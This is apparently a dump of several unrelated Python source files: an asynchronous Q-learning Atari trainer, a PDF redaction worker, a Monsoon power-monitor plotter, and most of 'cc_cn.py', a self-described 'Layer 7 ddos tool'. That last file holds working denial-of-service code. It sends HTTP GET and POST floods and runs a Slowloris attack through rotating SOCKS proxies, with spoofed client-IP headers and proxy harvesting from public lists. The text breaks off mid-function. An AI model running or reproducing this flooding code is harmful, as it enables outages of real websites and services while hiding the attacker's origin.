flags.DEFINE_string('checkpoint_dir', '/tmp/checkpoints', 'Directory for storing model checkpoints')
flags.DEFINE_integer('summary_interval', 5,
'Save training summary to file every n seconds (rounded '
'up to statistics interval.')
flags.DEFINE_integer('checkpoint_interval', 600,
'Checkpoint the model (i.e. save the parameters) every n '
'seconds (rounded up to statistics interval.')
flags.DEFINE_boolean('show_training', True, 'If true, have gym render evironments during training')
flags.DEFINE_boolean('testing', False, 'If true, run gym evaluation')
flags.DEFINE_string('checkpoint_path', 'path/to/recent.ckpt', 'Path to recent checkpoint to use for evaluation')
flags.DEFINE_string('eval_dir', '/tmp/', 'Directory to store gym evaluation')
flags.DEFINE_integer('num_eval_episodes', 100, 'Number of episodes to run gym evaluation.')
FLAGS = flags.FLAGS
T = 0
TMAX = FLAGS.tmax
def sample_final_epsilon():
"""
Sample a final epsilon value to anneal towards from a distribution.
These values are specified in section 5.1 of http://arxiv.org/pdf/1602.01783v1.pdf
"""
final_epsilons = np.array([.1,.01,.5])
probabilities = np.array([0.4,0.3,0.3])
return np.random.choice(final_epsilons, 1, p=list(probabilities))[0]
def actor_learner_thread(thread_id, env, session, graph_ops, num_actions, summary_ops, saver):
"""
Actor-learner thread implementing asynchronous one-step Q-learning, as specified
in algorithm 1 here: http://arxiv.org/pdf/1602.01783v1.pdf.
"""
global TMAX, T
# Unpack graph ops
s = graph_ops["s"]
q_values = graph_ops["q_values"]
st = graph_ops["st"]
target_q_values = graph_ops["target_q_values"]
reset_target_network_params = graph_ops["reset_target_network_params"]
a = graph_ops["a"]
y = graph_ops["y"]
grad_update = graph_ops["grad_update"]
summary_placeholders, update_ops, summary_op = summary_ops
# Wrap env with AtariEnvironment helper class
env = AtariEnvironment(gym_env=env, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height, agent_history_length=FLAGS.agent_history_length)
# Initialize network gradients
s_batch = []
a_batch = []
y_batch = []
final_epsilon = sample_final_epsilon()
initial_epsilon = 1.0
epsilon = 1.0
print "Starting thread ", thread_id, "with final epsilon ", final_epsilon
time.sleep(3*thread_id)
t = 0
while T < TMAX:
# Get initial game observation
s_t = env.get_initial_state()
terminal = False
# Set up per-episode counters
ep_reward = 0
episode_ave_max_q = 0
ep_t = 0
while True:
# Forward the deep q network, get Q(s,a) values
readout_t = q_values.eval(session = session, feed_dict = {s : [s_t]})
# Choose next action based on e-greedy policy
a_t = np.zeros([num_actions])
action_index = 0
if random.random() <= epsilon:
action_index = random.randrange(num_actions)
else:
action_index = np.argmax(readout_t)
a_t[action_index] = 1
# Scale down epsilon
if epsilon > final_epsilon:
epsilon -= (initial_epsilon - final_epsilon) / FLAGS.anneal_epsilon_timesteps
# Gym excecutes action in game environment on behalf of actor-learner
s_t1, r_t, terminal, info = env.step(action_index)
# Accumulate gradients
readout_j1 = target_q_values.eval(session = session, feed_dict = {st : [s_t1]})
clipped_r_t = np.clip(r_t, -1, 1)
if terminal:
y_batch.append(clipped_r_t)
else:
y_batch.append(clipped_r_t + FLAGS.gamma * np.max(readout_j1))
a_batch.append(a_t)
s_batch.append(s_t)
# Update the state and counters
s_t = s_t1
T += 1
t += 1
ep_t += 1
ep_reward += r_t
episode_ave_max_q += np.max(readout_t)
# Optionally update target network
if T % FLAGS.target_network_update_frequency == 0:
session.run(reset_target_network_params)
# Optionally update online network
if t % FLAGS.network_update_frequency == 0 or terminal:
if s_batch:
session.run(grad_update, feed_dict = {y : y_batch,
a : a_batch,
s : s_batch})
# Clear gradients
s_batch = []
a_batch = []
y_batch = []
# Save model progress
if t % FLAGS.checkpoint_interval == 0:
saver.save(session, FLAGS.checkpoint_dir+"/"+FLAGS.experiment+".ckpt", global_step = t)
# Print end of episode stats
if terminal:
stats = [ep_reward, episode_ave_max_q/float(ep_t), epsilon]
for i in range(len(stats)):
session.run(update_ops[i], feed_dict={summary_placeholders[i]:float(stats[i])})
print "THREAD:", thread_id, "/ TIME", T, "/ TIMESTEP", t, "/ EPSILON", epsilon, "/ REWARD", ep_reward, "/ Q_MAX %.4f" % (episode_ave_max_q/float(ep_t)), "/ EPSILON PROGRESS", t/float(FLAGS.anneal_epsilon_timesteps)
break
def build_graph(num_actions):
# Create shared deep q network
s, q_network = build_network(num_actions=num_actions, agent_history_length=FLAGS.agent_history_length, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height)
network_params = q_network.trainable_weights
q_values = q_network(s)
# Create shared target network
st, target_q_network = build_network(num_actions=num_actions, agent_history_length=FLAGS.agent_history_length, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height)
target_network_params = target_q_network.trainable_weights
target_q_values = target_q_network(st)
# Op for periodically updating target network with online network weights
reset_target_network_params = [target_network_params[i].assign(network_params[i]) for i in range(len(target_network_params))]
# Define cost and gradient update op
a = tf.placeholder("float", [None, num_actions])
y = tf.placeholder("float", [None])
action_q_values = tf.reduce_sum(q_values * a, reduction_indices=1)
cost = tf.reduce_mean(tf.square(y - action_q_values))
optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)
grad_update = optimizer.minimize(cost, var_list=network_params)
graph_ops = {"s" : s,
"q_values" : q_values,
"st" : st,
"target_q_values" : target_q_values,
"reset_target_network_params" : reset_target_network_params,
"a" : a,
"y" : y,
"grad_update" : grad_update}
return graph_ops
# Set up some episode summary ops to visualize on tensorboard.
def setup_summaries():
episode_reward = tf.Variable(0.)
tf.scalar_summary("Episode Reward", episode_reward)
episode_ave_max_q = tf.Variable(0.)
tf.scalar_summary("Max Q Value", episode_ave_max_q)
logged_epsilon = tf.Variable(0.)
tf.scalar_summary("Epsilon", logged_epsilon)
logged_T = tf.Variable(0.)
summary_vars = [episode_reward, episode_ave_max_q, logged_epsilon]
summary_placeholders = [tf.placeholder("float") for i in range(len(summary_vars))]
update_ops = [summary_vars[i].assign(summary_placeholders[i]) for i in range(len(summary_vars))]
summary_op = tf.merge_all_summaries()
return summary_placeholders, update_ops, summary_op
def get_num_actions():
"""
Returns the number of possible actions for the given atari game
"""
# Figure out number of actions from gym env
env = gym.make(FLAGS.game)
num_actions = env.action_space.n
if (FLAGS.game == "Pong-v0" or FLAGS.game == "Breakout-v0"):
# Gym currently specifies 6 actions for pong
# and breakout when only 3 are needed. This
# is a lame workaround.
num_actions = 3
return num_actions
def train(session, graph_ops, num_actions, saver):
# Initialize target network weights
session.run(graph_ops["reset_target_network_params"])
# Set up game environments (one per thread)
envs = [gym.make(FLAGS.game) for i in range(FLAGS.num_concurrent)]
summary_ops = setup_summaries()
summary_op = summary_ops[-1]
# Initialize variables
session.run(tf.initialize_all_variables())
summary_save_path = FLAGS.summary_dir + "/" + FLAGS.experiment
writer = tf.train.SummaryWriter(summary_save_path, session.graph)
if not os.path.exists(FLAGS.checkpoint_dir):
os.makedirs(FLAGS.checkpoint_dir)
# Start num_concurrent actor-learner training threads
actor_learner_threads = [threading.Thread(target=actor_learner_thread, args=(thread_id, envs[thread_id], session, graph_ops, num_actions, summary_ops, saver)) for thread_id in range(FLAGS.num_concurrent)]
for t in actor_learner_threads:
t.start()
# Show the agents training and write summary statistics
last_summary_time = 0
while True:
if FLAGS.show_training:
for env in envs:
env.render()
now = time.time()
if now - last_summary_time > FLAGS.summary_interval:
summary_str = session.run(summary_op)
writer.add_summary(summary_str, float(T))
last_summary_time = now
for t in actor_learner_threads:
t.join()
def evaluation(session, graph_ops, saver):
saver.restore(session, FLAGS.checkpoint_path)
print "Restored model weights from ", FLAGS.checkpoint_path
monitor_env = gym.make(FLAGS.game)
monitor_env.monitor.start(FLAGS.eval_dir+"/"+FLAGS.experiment+"/eval")
# Unpack graph ops
s = graph_ops["s"]
q_values = graph_ops["q_values"]
# Wrap env with AtariEnvironment helper class
env = AtariEnvironment(gym_env=monitor_env, resized_width=FLAGS.resized_width, resized_height=FLAGS.resized_height, agent_history_length=FLAGS.agent_history_length)
for i_episode in xrange(FLAGS.num_eval_episodes):
s_t = env.get_initial_state()
ep_reward = 0
terminal = False
while not terminal:
monitor_env.render()
readout_t = q_values.eval(session = session, feed_dict = {s : [s_t]})
action_index = np.argmax(readout_t)
s_t1, r_t, terminal, info = env.step(action_index)
s_t = s_t1
ep_reward += r_t
print ep_reward
monitor_env.monitor.close()
def main(_):
g = tf.Graph()
with g.as_default(), tf.Session() as session:
K.set_session(session)
num_actions = get_num_actions()
graph_ops = build_graph(num_actions)
saver = tf.train.Saver()
if FLAGS.testing:
evaluation(session, graph_ops, saver)
else:
train(session, graph_ops, num_actions, saver)
if __name__ == "__main__":
tf.app.run()
|
work_pdf_strategy.py | from urllib.request import urlopen
from work_strategies.work_base_strategy import WorkerBaseStrategy
from pdf2image import convert_from_path, convert_from_bytes
from presidio_image_redactor import ImageRedactorEngine
from threading import Lock,Thread, Semaphore
from PIL import Image, ImageChops
from presidio_image_redactor.image_analyzer_engine import ImageAnalyzerEngine
class WorkerPDFStrategy(WorkerBaseStrategy):
hyperthread_image_processing = True
## if we wanted to limit this across classes we could change this to active and remove it from the constructor
# thread_semaphore = Semaphore(5)
def __init__(self,domain, task_type):
super().__init__(domain, task_type)
self.my_lock = Lock()
self.image_analyzer = ImageAnalyzerEngine()
self.text_redactor = ImageRedactorEngine()
self.thread_semaphore = None
def _fetch(self, task):
try:
if task.in_is_local:
task.data = convert_from_path(task.in_endpoint)
else:
data = urlopen(task.in_endpoint).read()
task.data = convert_from_bytes(data, 'rb')
except Exception:
print(f'Error reading pdf from source: {task.in_endpoint}')
return task
def _process(self, task):
redacted_images = {}
local_threads = []
pdf_img_list = []
# self.thread_semaphore = Semaphore(task.config['max_thread_per_task']+1)
# print(task.config['max_thread_per_task'])
# In case we have a large doc, don't spin up too many threads
for pos,image in enumerate(task.data):
# self.thread_semaphore.acquire()
thread = Thread(target=self._redact_an_image, args=(image,pos,redacted_images,task))
local_threads.append(thread)
for thread in local_threads:
thread.start()
# wait for the threads to finish
for thread in local_threads:
thread.join()
# reassemble the doc in proper order
for num, page in sorted(redacted_images.items()):
pdf_img_list.append(page)
task.data = pdf_img_list
return task
def _push(self, worker, task):
print(f"Worker {worker.id} pushed task at {task.in_endpoint}")
worker.write_queue.put(task)
def _redact_an_image(self,img,key,output,task):
self.my_lock.acquire()
try:
temp = ImageChops.duplicate(img)
image_result = self.image_analyzer.analyze(temp)
if len(image_result) > 0:
task.profile["page"+str(key)] = str(image_result)
output[key] = self.text_redactor.redact(img, self.REDACT_COLOR)
except Exception:
print(f"Incompatible PDF type occured on page {key+1} in the doc located at {task.in_endpoint}... ignoring this page")
self.my_lock.release()
# self.thread_semaphore.release()
finally:
self.my_lock.release()
# self.thread_semaphore.release()
|
plot_realtime_power.py | #!/usr/bin/env python
import Monsoon.LVPM as LVPM
import Monsoon.HVPM as HVPM
from Monsoon import sampleEngine
import argparse
import csv
import os
import matplotlib
matplotlib.use('TKAgg')
from matplotlib import pyplot as plt
import matplotlib.animation as animation
import threading
import collections
import signal
import sys
fig, ax = plt.subplots()
plt.ylabel('amperage (mA)')
plt.xlabel('time sequences')
plt.ylim((0, 2000))
display_range = 50000
samples_queue = collections.deque(maxlen=display_range)
time_queue = collections.deque(maxlen=display_range)
time_queue.extend([0 for _ in range(display_range)])
samples_queue.extend([0 for _ in range(display_range)])
line, = ax.plot(time_queue, samples_queue, linewidth=0.5)
should_pause = False
csv_file_handle = None
csv_writer = None
trigger_count = 0
trigger = float("inf")
triggered = False
header = ["Time(ms)", "Main(mA)", "Main Voltage(V)"]
def animate(_):
if should_pause:
return line,
# print("samples: {}".format(latest_current_values))
line.set_xdata(time_queue)
line.set_ydata(samples_queue) # update the data
ax.relim()
for label in ax.xaxis.get_ticklabels()[::100]:
label.set_visible(False)
ax.autoscale_view(True, True, True)
return line,
def sample_generator(sampler, sample_number_):
sampler.startSampling(sample_number_, output_callback=samples_callback)
def samples_callback(samples_):
last_values = samples_[sampleEngine.channels.MainCurrent]
if last_values:
# filter negative values
valid_values = [max(v, 0) for v in last_values]
time_queue.extend(samples_[sampleEngine.channels.timeStamp])
samples_queue.extend(valid_values)
avg = sum(valid_values) / len(valid_values)
global triggered
if avg > trigger:
global csv_file_handle, csv_writer
if csv_file_handle:
print("recording", avg, len(valid_values))
records = list(zip(samples_[sampleEngine.channels.timeStamp],
samples_[sampleEngine.channels.MainCurrent],
samples_[2]))
if not csv_writer:
csv_writer = csv.writer(csv_file_handle)
csv_writer.writerow(header)
csv_writer.writerows(records)
triggered = True
else:
if triggered and csv_file_handle:
print("stopped trigger")
csv_file_handle.close()
csv_file_handle = None
def on_click(_event):
global should_pause
if _event.dblclick:
should_pause ^= True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--number_of_samples", type=int, default=-1,
help="number of power samples per second, default to -1 meaning sample infinitely")
parser.add_argument("-m", "--monsoon_model", choices=("lvpm", "hvpm", "l", "h", "black", "white", "b", "w"),
default="w",
help="Monsoon type, either white(w,l,lvpm) or black(b,h,hvpm)")
parser.add_argument("-s", "--save_file", type=str, default=None, # 'data/power_samples.csv',
help="file to save power samples")
parser.add_argument("-t", "--trigger", type=float, default=float("inf"),
help="threshold to trigger sampling, unit is mA")
args = parser.parse_args()
sample_number = args.number_of_samples if args.number_of_samples > 0 else sampleEngine.triggers.SAMPLECOUNT_INFINITE
monsoon_model = args.monsoon_model
if monsoon_model.startswith('l') or monsoon_model.startswith('w'):
monsoon = LVPM.Monsoon() # white
else:
monsoon = HVPM.Monsoon()
monsoon.setup_usb()
print("Monsoon Power Monitor Serial number: {}".format(monsoon.getSerialNumber()))
engine = sampleEngine.SampleEngine(monsoon)
trigger = args.trigger
if args.save_file:
dir_name = os.path.dirname(args.save_file)
if not os.path.exists(dir_name):
os.makedirs(dir_name)
if trigger < float("inf"): # set trigger
engine.disableCSVOutput()
# global csv_name
csv_file = args.save_file
csv_file_handle = open(csv_file, 'w')
else:
engine.enableCSVOutput(args.save_file)
else:
engine.disableCSVOutput()
engine.ConsoleOutput(True)
def signal_handler(_signal, _frame):
print('You pressed Ctrl+C, clearing monsoon sampling and exit!')
monsoon.stopSampling()
sys.exit(0)
def handle_close(_event):
print('You cosed figure, clearing monsoon sampling and exit!')
monsoon.stopSampling()
sys.exit(0)
fig.canvas.mpl_connect('close_event', handle_close)
fig.canvas.mpl_connect('button_press_event', on_click)
signal.signal(signal.SIGINT, signal_handler)
pt = threading.Thread(target=sample_generator, name='sample_generator', args=(engine, sample_number))
pt.daemon = True
pt.start()
ani = animation.FuncAnimation(fig, animate, interval=100)
plt.show()
|
cc_cn.py | #!/usr/bin/python3
#Coded by L330n123
#########################################
# I removed the mixed proxies flood #
# because in my perspective, it doesn't #
# give more performance when flooding. #
# -- L330n123 #
#########################################
'''
I'm working on Aoyama's update so this project will stop for a while
'''
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
import datetime
#import multiprocessing #i'm working on it
print ('''
///// ///// /////////////
CCCCC/ CCCCC/ | CC-attack |/
CC/ CC/ |-----------|/
CC/ CC/ | Layer 7 |/
CC///// CC///// | ddos tool |/
CCCCC/ CCCCC/ |___________|/
>--------------------------------------------->
Python3 version Beta
C0d3d by L330n123
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Tos: Don't attack .gov website โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ New stuff: โ
โ + Customize Cookies โ
โ + Customize data of post mode โ
โ + Fast Port Re-use โ
โ + Added Random client ip โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ Link: https://www.54yuanma.com/ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ''')
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
"https://www.google.com/search?q=",
"https://check-host.net/",
"https://www.facebook.com/",
"https://www.youtube.com/",
"https://www.fbi.com/",
"https://www.bing.com/search?q=",
"https://r.search.yahoo.com/",
"https://www.cia.gov/index.html",
"https://www.police.gov.hk/",
"https://www.mjib.gov.tw/",
"https://www.president.gov.tw/",
"https://www.gov.hk",
"https://vk.com/profile.php?redirect=",
"https://www.usatoday.com/search/results?q=",
"https://help.baidu.com/searchResult?keywords=",
"https://steamcommunity.com/market/search?q=",
"https://www.ted.com/search?q=",
"https://play.google.com/store/search?q=",
]
data = ""
cookies = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&"
###################################################
Intn = random.randint#idk but it looks like can reduce some cpu usage and time.
Choice = random.choice
setsocks = socks.setdefaultproxy
###################################################
def getuseragent():
platform = Choice(['Macintosh', 'Windows', 'X11'])
if platform == 'Macintosh':
os = Choice(['68K', 'PPC', 'Intel Mac OS X'])
elif platform == 'Windows':
os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64'])
elif platform == 'X11':
os = Choice(['Linux i686', 'Linux x86_64'])
browser = Choice(['chrome', 'firefox', 'ie'])
if browser == 'chrome':
webkit = str(Intn(500, 599))
version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' + str(Intn(0, 999))
return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit
elif browser == 'firefox':
currentYear = datetime.date.today().year
year = str(Intn(2020, currentYear))
month = Intn(1, 12)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
day = Intn(1, 30)
if day < 10:
day = '0' + str(day)
else:
day = str(day)
gecko = year + month + day
version = str(Intn(1, 72)) + '.0'
return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
elif browser == 'ie':
version = str(Intn(1, 99)) + '.0'
engine = str(Intn(1, 99)) + '.0'
option = Choice([True, False])
if option == True:
token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; '
else:
token = ''
return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'
def randomurl():
return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings))
def cc(socks_type):
connection = "Connection: Keep-Alive\r\n"
if cookies != "":
connection += "Cookies: "+str(cookies)+"\r\n"
err = 0
if port == 443 :
n = "HTTPS"
else:
n = "CC"
while True:
fake_ip = "X-Forwarded-For: "+str(Intn(1,255))+"."+str(Intn(0,255))+"."+str(Intn(0,255))+"."+str(Intn(0,255))+"\r\n"
fake_ip += "Client-IP: "+str(Intn(1,255))+"."+str(Intn(0,255))+"."+str(Intn(0,255))+"."+str(Intn(0,255))+"\r\n"
accept = Choice(acceptall)
referer = "Referer: "+Choice(referers)+ ip + url2 + "\r\n"
try:
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
if err > 10:
print("[!] Target or proxy maybe down| Changing proxy")
break
s = socks.socksocket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(ip), int(port)))
if port == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
print ("[*] "+n+" Flooding from | "+str(proxy[0])+":"+str(proxy[1]))
try:
for _ in range(multiple):
useragent = "User-Agent: " +getuseragent() + "\r\n"
get_host = "GET " + url2 + "?" + randomurl() + " HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + referer + useragent + accept + connection + fake_ip+"\r\n"
s.send(str.encode(request))
s.close()
except:
s.close()
except:#dirty fix
pass
err = err +1
cc(socks_type)
def post(socks_type):
global data
post_host = "POST " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\n"
refer = "Referer: http://"+ ip + url2 + "\r\n"
user_agent = "User-Agent: " + getuseragent() + "\r\n"
accept = Choice(acceptall)
if mode2 != "y":
data = str(random._urandom(16)) # You can enable bring data in HTTP Header
length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n"
if cookies != "":
length += "Cookies: "+str(cookies)+"\r\n"
request = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
proxy = Choice(proxies).strip().split(":")
err = 0
if port == 443 :
n = "HTTPS"
else:
n = "CC"
while True:
try:
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
if err > 10:
print("[!] Target or proxy maybe down| Changing proxy")
break
s = socks.socksocket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(ip), int(port)))
if str(port) == '443': # //AUTO Enable SSL MODE :)
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
print ("[*] "+n+" Post Flooding from | "+str(proxy[0])+":"+str(proxy[1]))
try:
for _ in range(multiple):
s.send(str.encode(request))
s.close()
except:
s.close()
except:
pass#dirty fix
err = err + 1
post(socks_type)
socket_list=[]
def slow(conn,socks_type):
try:#dirty fix
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
except:
print("[!] Something wrong in socks list")
slow(conn,socks_type)#restart
for _ in range(conn):
try:
s = socks.socksocket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.settimeout(0.6)
s.connect((str(ip), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
while True:
for s in list(socket_list):
try:
s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8"))
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
socket_list.remove(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
for _ in range(conn - len(socket_list)):
try:
s.settimeout(1)
s.connect((str(ip), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
pass
nums = 0
def checking(lines,socks_type,ms):#Proxy checker coded by Leeon123
global nums
global proxies
try:#dirty fix
proxy = lines.strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
except:
proxies.remove(lines)
return
err = 0
while True:
if err == 3:
proxies.remove(lines)
break
try:
s = socks.socksocket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.settimeout(ms)#You can change by yourself
s.connect((str(ip), int(port)))
if port == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
s.close()
break
except:
err +=1
nums += 1
def check_socks(ms):#Coded by Leeon123
global nums
thread_list=[]
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking,args=(lines,5,ms,))
th.start()
if choice == "4":
th = threading.Thread(target=checking,args=(lines,4,ms,))
th.start()
thread_list.append(th)
time.sleep(0.01)
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
for th in list(thread_list):
th.join()
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies)))
ans = input("> Do u want to save them in a file? (y/n, default=y)")
if ans == "y" or ans == "":
if choice == "4":
with open("socks4.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks4.txt.")
elif choice == "5":
with open("socks5.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks5.txt.")
def check_list(socks_file):
print("> Checking list")
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i,encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
if choice == "4":
f = open("socks4.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all&timeout=1000")
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4")
